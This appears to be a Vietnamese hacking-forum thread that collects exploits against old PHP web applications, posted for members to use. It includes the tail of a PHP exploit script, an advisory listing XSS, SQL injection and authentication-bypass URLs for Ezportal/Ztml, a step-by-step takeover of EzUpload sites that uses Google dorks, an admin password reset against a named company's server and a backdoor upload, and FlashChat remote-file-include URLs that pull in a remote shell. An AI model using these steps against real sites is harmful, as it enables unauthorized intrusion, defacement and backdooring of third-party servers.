Thấy hay post Anh em dùng chơi..Cái này sau khi chiếm Admin upload backdoor local ..hơi sướng!. Nhiều file bị lỗi nghiêm trọng giúp attacker có thể chiếm quyền, upload những mã nguy hiểm
Trang 1sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\n";
echo "Check register_globals = On and magic_quotes_gpc = off\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
?>
black_hat_cr(HCE)
Ezportal/Ztml v1.0 Multiple vulnerabilities
Topic : Ezportal/Ztml v1.0 Multiple vulnerabilities
SecurityAlert Id : 1481
CVE : CVE-2006-4502
CVE : CVE-2006-4501
CVE : CVE-2006-4500
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Hessamx hessamx net
Date : 2.9.2006
Affected Software : Ezportal/Ztml v1.0
Advisory Text :
:: Ezportal/Ztml v1.0 Multiple vulnerabilities ::
-
Trang 2Software : Ezportal/Ztml
Website : http://www.ztml.org
Bug Discover : Hessam-x / www.hessamx.net
I Multiple Cross Site Scripting Vulnerabilities
-
Parameters :
About , Again , Lastname , Email , password , album,
id , table , desc , doc , mname , max , htpl ,pheader , & more
are not properly sanitized in "Index.php"
This can be used to post arbitrary HTML or web script code
Attacker can be execute this url :
index.php?about=[XSS]
index.php?username=GUEST&again=[XSS]
&
II SQL Injection Vulnerabilities
-
Parameters:
Trang 3about , album , id , use , desc , doc , max , mname , & Other
is not properly sanitized before being used in SQL query
vulnerable Page is : "index.php"
This can be used make any SQL query by injecting arbitrary SQL code
Attacker can be execute this url :
index.php?about=[SQL Query]&use=ezportal.home.about.this.template
index.php?doc=[SQL
Query]&etpl=ezp.home.update.status&ukey=_zdoc.zdoc.group
& other
III Authentication Bypass Vulnerability
-
"Administration Area" script has no any authentication
Any user can get access to administrator's area.Just need to know script name
black_hat_cr(HCE)
EzUpload multi file vulnerabilities
Trang 4Bài này của lão H2P bên VBF ! Thấy hay post Anh em dùng chơi Cái này sau khi chiếm Admin upload backdoor local hơi sướng ! Hôm nay mới public trên
Securityforcus Anh em nhanh chân nhé !
http://www.securityfocus.com/bid/19175
EzUpload la một chương trình trao đổi file khá hay, tuy nhiên nó có lỗi rất nguy hiểm Nhiều file bị lỗi nghiêm trọng giúp attacker có thể chiếm quyền, upload những mã nguy hiểm
Các file bị lỗi: http://www.securityfocus.com/archive /30/0/threaded
Bắt đầu nhé:
- Download file đính kèm
- Tìm mục tiêu:
Vào google.com search keyword: allinurl: "ezupload" nó ra quá trời kết quả và dĩ nhiên tại thời điểm này gần 100% có thể khai thác
- Khai thác:
Như đã nói ở trên (http://www.securityfocus.com/archive /30/0/threaded) có 5 file dính lỗi nên có nhiều cách khai thác nhưng tôi chỉ hướng dẫn cách "làm admin" khi được làm admin rồi thì không cần biết các cách khác nữa
a Lấy password admin
VD chọn thằng ku: http://handledwithcarecards.com/ezupload để thử Đây là một server riêng của một công ty
Dùng notepad mở file change pass.htm tìm dòng <form method="post"
action="handledwithcarecards.com/ezupload/settings.php"> thay cho phù hợp trong trường hợp này để nguyên <form method="post"
action="http://handledwithcarecards.com/ezupload/settings.php">
Save lại và chạy nó
Ô thứ 3 và thứ 4 (Admin Password) nhập password mới vào (5 ký tự trở lên), các ô khác bỏ trống Nhấn Save Changes và chờ nó chuyển đến một trang xấu hoắc có mỗi cái form nhập pass Nhập cái password của ta vào OK và Control của nó rồi
Trang 5b Re-config
- Nhấn thẻ Filter: Đánh dấu vào radio trên cùng All file extensions (not
recommended) nhấn Save Changes Cái này sẽ chấp nhận upload tất cả các loại file, làm nhu vậy ta mới có thể upload php/cgi/asp backdoor
- Nhấn thẻ Access Control: Đánh dấu vào radio trên cùng Allows everyone to access the upload form nhấn submit Cái này sẽ chấp nhận anyone upload mà
không cần đăng nhập
c Upload backdoor hoặc file làm bằng chứng đột nhập
Vô http://handledwithcarecards.com/ezupload
để upload backdoor lên Vào lại Admin nhấn thẻ Browse để tìm url của con
backdoor vừa upload
Chạy nó và đọc bài Local Attack để tiếp tục
Xong Xin đừng quậy phá
File Kèm Theo
change pass.zip (3.3 KB, 18 lần tải)
getrootvn(HCE)
FlashChat<=4.5.7 <<Remote File Include
Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://địa chỉ con shell
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://địa chỉ con shell
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://địa chỉ con shell?
ok, bug remote file include kiếm những site xài cái này trong google với:
Code:
inurl:/inc/cmses/aedating4CMS.php